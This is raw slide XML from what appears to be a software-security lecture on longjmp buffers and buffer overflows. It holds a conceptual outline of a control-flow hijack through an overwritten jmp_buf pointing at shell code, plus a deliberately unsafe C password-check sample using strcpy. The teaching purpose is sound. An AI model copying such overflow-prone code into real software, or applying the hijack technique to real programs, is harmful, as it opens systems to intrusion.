                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>env</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>.__</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>jmpbuf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>[JB_BP], %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  /* restore base </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>ptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> */</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>env</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>.__</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>jmpbuf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>[JB_SP], %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  /* restore stack </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>ptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> */</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>jmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>env</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>.__</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>jmpbuf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>[JB_PC])      /* jump to stored PC */</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="203551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38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387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0387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0387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0387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24" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Designing an Exploit</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1105925" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If a long jump buffer can be overwritten by attacker-specified data, it is possible to modify the control flow of an application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The exploit requires:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>setjmp(env</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>An overflow attack that overwrites </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>env</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Set  target PC value to start of shell code </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Set stored BP and SP so that shell code has legal memory area for stack operations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A call to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>longjmp(env</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="193466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59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59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0592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0592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0592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0592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0592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Learned</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Make sure that sensitive data structures cannot be overwritten</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="203853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1158" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What is Overwritten: </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A Carefully (?) Developed Program</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1201159" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1519178"/>
            <a:ext cx="8229600" cy="4525963"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>checkpwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>char *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>)                                                    </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>{                                                                        </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>char</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>mypwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>[512];                                                       </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>mypwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>, p); /* creates copy of the password */                   </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  /* Performs the check on the copy... */                                </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>("Checking password %s\n", </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>mypwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>);                               </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  return 0;                                                              </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>}                                                                                                                                               </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>main</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>char *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>[])                                        </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>{                                                                        </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>char </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>username</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>[512];                                                    </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>char </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>[512];                                                                                                                     </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>strncpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>(password, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>[1], 512);                                       </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>strncpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
